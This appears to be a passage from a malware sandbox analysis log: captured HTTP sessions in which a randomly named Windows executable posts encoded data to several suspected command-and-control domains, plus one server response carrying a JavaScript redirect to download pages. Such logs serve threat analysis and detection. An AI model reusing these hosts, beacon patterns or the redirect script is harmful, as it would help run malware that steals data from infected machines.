                                                              Data Ascii: XvhP6L=V99dEg2HZocGul0DkjM9lgcFI6dySuGPKwfCtHiPlbuL0WvFCbEv6s7uMV3THsn3uutDFbqSnuz5o8iwsuVOi3ZmcIkm/x3F3CZajAeWyUbEp3L4m//zohgVpQfY1AnivyOHRAZ8ubOToCKYIHKn49ytEdZmRrzTBRMHzudCwdS/z4P+fKHTp7Va1N5qkRYi3nU1NVpH61eqvOJ8n4fVpdpWT83UedwvTE8iEWM=
Sep 11, 2024 22:55:06.622433901 CEST | 279 | IN | HTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              date: Wed, 11 Sep 2024 20:55:06 GMT
                                                              server: LiteSpeed
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              transfer-encoding: chunked
                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 59663 | 152.53.38.0 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 22:55:08.729110956 CEST | 1717 | OUT | POST /7f48/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.nuv3.top
                                                              Origin: http://www.nuv3.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.nuv3.top/7f48/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Sep 11, 2024 22:55:09.182925940 CEST | 992 | IN | HTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              date: Wed, 11 Sep 2024 20:55:09 GMT
                                                              server: LiteSpeed
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              transfer-encoding: chunked
                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 59665 | 152.53.38.0 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 22:55:11.268712044 CEST | 436 | OUT | GET /7f48/?XvhP6L=Y/V9HWeQI6V9wDpav31Zmzk5MY4+Ou2xQiPhqUb5lc+p8ROSXtAF44jgGkfnSdbIjMV3KY+ys+uzmsyZr9wUrSReS7kDqE3Vwy5Stw7V8E2w1yWugNHB1ko6qS7b9UC1jiexBCRL4rzt&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.nuv3.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:55:11.746623993 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              content-length: 1249
                                                              date: Wed, 11 Sep 2024 20:55:11 GMT
                                                              server: LiteSpeed
                                                              connection: close
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
                                                              Sep 11, 2024 22:55:11.746649981 CEST | 224 | IN |
                                                              Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              5 | 192.168.2.7 | 59666 | 23.225.34.75 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:55:17.300864935 CEST | 690 | OUT | POST /u0n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.bashei.top
                                                              Origin: http://www.bashei.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.bashei.top/u0n6/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=el/vKm5BMwKte9Hzxb0veLzTLOc82bGrTTqrzFAeKnm7DATDxXFUtRBB7vmgjJjJQdTY7x9jL4yDncesYMcSEbNy6ONqG3ssBERbpKr7PoKMP7uydqeXofSdR16651vRYnchLdEX/fENrABYaaIm4LMJccwmCJcl3gmb8574nsal60OBM+otvAkLbA30KZwrX/dmjJUxtCrqkB4M+A==
                                                              Sep 11, 2024 22:55:17.898739100 CEST | 707 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:55:17 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              6 | 192.168.2.7 | 59667 | 23.225.34.75 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:55:19.848762035 CEST | 710 | OUT | POST /u0n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.bashei.top
                                                              Origin: http://www.bashei.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.bashei.top/u0n6/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=el/vKm5BMwKtPsXz9YcvZrzUFuc847GvTSWrzEVZKVC7CibD/2FUsRBBzPmltpjWQdfq70FjL5WDndusY+0RELNw8ONsYHssBERbpKuzPoCMPKeySuKQg/SaW166zVvNYncDLcYx/dMNrEFYaIwlyLMPYcxlJ7p+tCiZ042mocmG7CTjWckBxRcwfCTCd/teV+Z+urgQy1OApTZIo0qratxXqns5iMfsLlGmD6A=
                                                              Sep 11, 2024 22:55:21.072299004 CEST | 707 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:55:20 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              7 | 192.168.2.7 | 59668 | 23.225.34.75 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:55:22.396318913 CEST | 1723 | OUT | POST /u0n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.bashei.top
                                                              Origin: http://www.bashei.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.bashei.top/u0n6/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L= [TRUNCATED]
                                                              Sep 11, 2024 22:55:22.976957083 CEST | 707 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:55:22 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              8 | 192.168.2.7 | 59669 | 23.225.34.75 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:55:24.950640917 CEST | 438 | OUT | GET /u0n6/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=TnXPJRFedBjcAOKsz8A4RrjZJ/J8mpS0RRmNukYQVSavKw+Pr3ZL00k0+s6r1anvS9TkkUZZGYzdsNqRXNwCKrFNx4FeTSUtckB8ipahHKvydrXWZ9yissqQQy/l7XTEZmUeENIc2eR0 HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.bashei.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:55:25.554009914 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:55:25 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Data Ascii: 5d9<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><script type="text/javascript" src="https://js.users.51.la/21851687.js"></script><script language="javascript">if(window.navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad)/i)) {setTimeout(function(){var arr=["https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a2.html"];window.location.href=arr[parseInt(Math.random()*arr.length)]},0000); }else if(window.navigator.userAgent.match(/(Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)){setTimeout(function(){var arr=["https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html","https:/ [TRUNCATED]
                                                              Sep 11, 2024 22:55:25.554037094 CEST | 449 | IN |
                                                              Data Ascii: ad/57601869/57601869a2.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a5.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/
                                                              Sep 11, 2024 22:55:25.554052114 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              9 | 192.168.2.7 | 59670 | 3.33.130.190 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:55:30.611701012 CEST | 711 | OUT | POST /squz/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.tigre777gg.online
                                                              Origin: http://www.tigre777gg.online
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.tigre777gg.online/squz/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=Lj2aVLsM9EmwXqy31z/07Q1zDlcWuIDn4QjQYD2ZSTDdcsqc891SQVXVXYGVFiEKnUIL/UrCmq2NviL0Vx+EVBdVsixZRaThukD/rnOQXCLKPc1zwOhFZmSIXfV7TWuuje/IC4SS0iZlX/KUze5wlnmyYCoA6NhuiiKhvfpuiED856q0lWi9NCs2ouKwJ8cqnXqFxffydUSx5Vx0BA==


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              10 | 192.168.2.7 | 59671 | 3.33.130.190 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:55:33.168991089 CEST | 731 | OUT | POST /squz/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.tigre777gg.online
                                                              Origin: http://www.tigre777gg.online
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.tigre777gg.online/squz/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=Lj2aVLsM9EmwXKi3mAX0sg1yMFcW34Dj4QvQYCyJRmrdSuyc7M1Se1XVf4GQYSEBnV0l/UXCmqSNvj70UBCHURdXkCxff6ThukD/rmq2XCTKMtlz/PgTH2SHAvV7XWuqje/qC8y00ghlX6uUyLNzrXmoFSpc0YYRlBuvm89Ll2Po4M3W/0uRTTUNssuGeaBflWud89rTCj3b0HQwXztQAmg0hpBve5baQ1Y+veA=


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              11 | 192.168.2.7 | 59672 | 3.33.130.190 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:55:35.708132029 CEST | 1744 | OUT | POST /squz/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.tigre777gg.online
                                                              Origin: http://www.tigre777gg.online
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.tigre777gg.online/squz/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L= [TRUNCATED]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              12 | 192.168.2.7 | 59673 | 3.33.130.190 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:55:38.252099991 CEST | 445 | OUT | GET /squz/?XvhP6L=Ghe6W9NY/2rmdpfmin3r4worEkhFv7TpyCLvYyDJFGDSfcbT98d0cG77XKGOFhcNgHgKwlDxqJr9ryKJWiSYVmpZriF7ZoTYlTDCrmWRZjH+de0P0vE8b0uWMMVzUUSCh4ryC6am+BcV&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.tigre777gg.online
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:55:38.710616112 CEST | 423 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Wed, 11 Sep 2024 20:55:38 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 283
                                                              Connection: close
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?XvhP6L=Ghe6W9NY/2rmdpfmin3r4worEkhFv7TpyCLvYyDJFGDSfcbT98d0cG77XKGOFhcNgHgKwlDxqJr9ryKJWiSYVmpZriF7ZoTYlTDCrmWRZjH+de0P0vE8b0uWMMVzUUSCh4ryC6am+BcV&Xt7D=9p4tP8lp52ndpXM"}</script></head></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              13 | 192.168.2.7 | 59674 | 65.108.194.49 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:55:43.828790903 CEST | 690 | OUT | POST /bzo0/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.maya24.xyz
                                                              Origin: http://www.maya24.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.maya24.xyz/bzo0/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=GK/CJWPhpNJWcMch5wDsNee8eXVmnQUUXKAaUvKthPBKsktS2as4gOKQ/DaymX8nP6fc5wN5kOLB3ynhdtJsAWqPhaRINnV6nSRbM0hOLs8nLzjMM1f7T0/INWj7jToftUIj9sMnEKGXB5jJkCFt1nfxHYaCPMmgmKMa3y3gSeYuFQwsjRAmnZypsxh9YIvRWHO+eZJpo3gZG8NerQ==
                                                              Sep 11, 2024 22:55:44.781991005 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              x-powered-by: PHP/7.4.33
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              content-type: text/html; charset=UTF-8
                                                              link: <https://maya24.xyz/wp-json/>; rel="https://api.w.org/"
                                                              transfer-encoding: chunked
                                                              content-encoding: br
                                                              vary: Accept-Encoding
                                                              date: Wed, 11 Sep 2024 20:55:44 GMT
                                                              server: LiteSpeed


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              14 | 192.168.2.7 | 59675 | 65.108.194.49 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:55:46.367336988 CEST | 710 | OUT | POST /bzo0/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.maya24.xyz
                                                              Origin: http://www.maya24.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.maya24.xyz/bzo0/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=GK/CJWPhpNJWdsshqRDsaue/bXVmuwVdXKEaUsG9i8pKsBRS47s4lOKQrTa3iX8aP6ih5xd5kN3B3yXheexrBGqN4qRwQXV6nSRbM00jLsknKCTMDxL8Nk/HbGj71TpUtUJG9tAJEMaXB8nJjTFs+nf3LIble+OliKEx0D31fuACAmtO5zMK5IKSozFLPuykUGKmT79I3AFzLusa9jFi3DcOtsrr/S/i4WJXEmQ=
                                                              Sep 11, 2024 22:55:47.303877115 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              x-powered-by: PHP/7.4.33
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              content-type: text/html; charset=UTF-8
                                                              link: <https://maya24.xyz/wp-json/>; rel="https://api.w.org/"
                                                              transfer-encoding: chunked
                                                              content-encoding: br
                                                              vary: Accept-Encoding
                                                              date: Wed, 11 Sep 2024 20:55:47 GMT
                                                              server: LiteSpeed


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              15 | 192.168.2.7 | 59676 | 65.108.194.49 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:55:48.913794041 CEST | 1723 | OUT | POST /bzo0/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.maya24.xyz
                                                              Origin: http://www.maya24.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.maya24.xyz/bzo0/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=GK/CJWPhpNJWdsshqRDsaue/bXVmuwVdXKEaUsG9i8xKtzpS4cQ4iOKQoTa2iX8LP+Ot5xRpkL7B2T3hfvxrY2qNlaRLNnUwnSBfM0kjLsknKALMKFf8Pk/INWjvjToztQlw9tF8H/CXBc3Jmgts9Hf1K4b9e+T1iKY90DTffpsCBHMNuQ4psKbL0CxIZ/LQV0SsXMZW6jNUKv5TznUEjz4T1tT9siu3rXlIYg9n6D+k71ikyTNFEOmdS6qsjrQ31THhAPgbnLrGt1/Fr+5WYxzYY+bMuG5dNMu+ATCwdbIr5oApwUFojXvXIgLWDfvo617kMJf71/XlRx8OOsIsEq2QC6hYOmqhk2TI88qc4eoBR/7onqk1rs1ABg1OY70ZnsaUq5Wov88FLUl3zqQcMClcFuQtUWVsUIy91lQ9VnS/NPKtCvEMoWtulwr0goGkE6C7AQPNeNjj0Ts2r2iP08c/UI3bu6AteH0Nwb66nnV5PcG0exvBDEaL8LUg4Kzj8NfYdIBHVsQJ4LmDL0YrRVB/wOiTLQpxY5dgKqr1GAZS1aYGmQRBaXRYMK+xG5EgaMcaulFO0Ah6FC0SW1qYymQHzld9TkgdNnaO4CTBVQBS50TXaUiGITZ1z8ZWWoXYCedx2TXcZaHQP4rUrxhxNc6+JDau+V+GJkwmM21tanaYXbmyVAsOFpW55ZvGFwvorZkjB94l+Nuz68YPf0sD3i/r757AD+4ccAARWWzmMMElVOtlLBOwuFQfpSO1G1GjtbMecoxzuKiSCqqdbwbcbJvMbYyATFlJPjjaZwN+dBzC5NtrDSPJaV9vhZsG54qzuWRfELNq2tbxCxsM0bvmt2V0/aDRcId4go0GK0WOo/PdozrKDcn/4etGTbx+w83ix8q8frE5eWxA8N9FTdGoDvoAdN1OpGuSS2XlQJqxMXLcGU2xry4D48N0XfEa8oh9zsRpHsy4k6yV9Rqcni+gHoK6uI4pOQurHZD6sCP8/FEhM [TRUNCATED]
                                                              Sep 11, 2024 22:55:49.964472055 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              x-powered-by: PHP/7.4.33
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              content-type: text/html; charset=UTF-8
                                                              link: <https://maya24.xyz/wp-json/>; rel="https://api.w.org/"
                                                              transfer-encoding: chunked
                                                              content-encoding: br
                                                              vary: Accept-Encoding
                                                              date: Wed, 11 Sep 2024 20:55:49 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: T*6zuHG$dB%YRP5E*ig#ITGc:yEKwh[9RdwPd]l`"P*IF.}OWb$Z%UQ b-M&AW!:dcTM'4AH4qA#kJ7P{[Pm7;Rqk0xR#Clr
                                                              Sep 11, 2024 22:55:49.964735985 CEST1236INData Raw: c8 cf f6 1a e2 72 c0 68 08 87 e3 63 a3 5a 01 71 d8 34 c9 88 ff 78 3c 9e c2 58 29 ee e1 bb 06 c0 b9 37 9b c2 51 ee 29 3f 03 7c 91 ac d3 82 f7 7f 7d 5d f3 12 5c f0 26 b1 31 c7 2d 69 de 12 f5 8d 43 02 c0 9c 8e 4a 60 c5 bf 59 7b a5 eb 15 54 80 77 a4
                                                              Data Ascii: rhcZq4x<X)7Q)?|}]\&1-iCJ`Y{Tw3[(e>#v[c^WO\s'oT)y|KiMA&!Bno(W 'xT_YiAqFOJf,n9"v8O4l81:OQ8z
                                                              Sep 11, 2024 22:55:49.964772940 CEST1120INData Raw: be 2e 60 74 21 b6 a2 36 f2 26 79 1c db db 57 59 55 f8 41 89 78 89 d2 a3 c4 93 16 fc e1 f3 0f 9f 7f f8 6c 78 4a 23 27 28 44 ec 40 8d 26 de b9 0b 50 6e fe a1 a0 ec 4c 61 39 9d bd 0f 37 fb 42 32 e5 17 c4 59 9a e9 6b 96 4a 80 ec 7a 7a 0a d4 43 7d 89
                                                              Data Ascii: .`t!6&yWYUAxlxJ#'(D@&PnLa97B2YkJzzC} <!gB]O+\xE1vhx[9CZ7Y"2nt]p`W-@\/kzl!b(o?XE`l[e$Ov9<A]7+%^X->cV.yY)$dK
                                                              Sep 11, 2024 22:55:49.964813948 CEST1236INData Raw: 42 aa 68 de e8 e6 d8 86 31 be 97 9e 0c 7c e6 30 2b 07 c3 0e 03 00 3d bf 42 62 04 a4 60 89 35 2f 84 08 1e ce b1 7b 96 86 e9 3d 38 44 39 80 54 c7 b1 5b c2 93 72 4d c3 56 22 d4 8f ce bc 54 71 3c f4 ff 56 51 a2 95 b6 87 c2 c9 05 a7 98 e4 09 7b 28 ef
                                                              Data Ascii: Bh1|0+=Bb`5/{=8D9T[rMV"Tq<VQ{(]#2B7b6y4@qr4yV(*${|,E&%S7la`z/'c<6`ukoJ\S~rou *FTClJ~uL
                                                              Sep 11, 2024 22:55:49.973081112 CEST1236INData Raw: f5 6f 0e 38 4c 6e 52 86 0e 9e d2 44 5d 53 78 9f f0 86 7e 92 57 25 35 73 e6 60 1f 66 47 e9 7b cb 69 c4 a0 7f c8 86 9d c7 c4 67 2a 7a c7 1a 28 c8 b6 71 ab 55 a2 32 80 30 82 1b 86 3e be 35 2c 99 f1 e0 fb 10 ed 23 c6 dd 5b ff 2a 6f 2d 9a 51 6a 58 11
                                                              Data Ascii: o8LnRD]Sx~W%5s`fG{ig*z(qU20>5,#[*o-QjX|5M,Qw1{J[0oU.TK[ vf>w!JOYdR]Sk1N1}\m5QX$w|vQBrU-\|96HR;1R


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
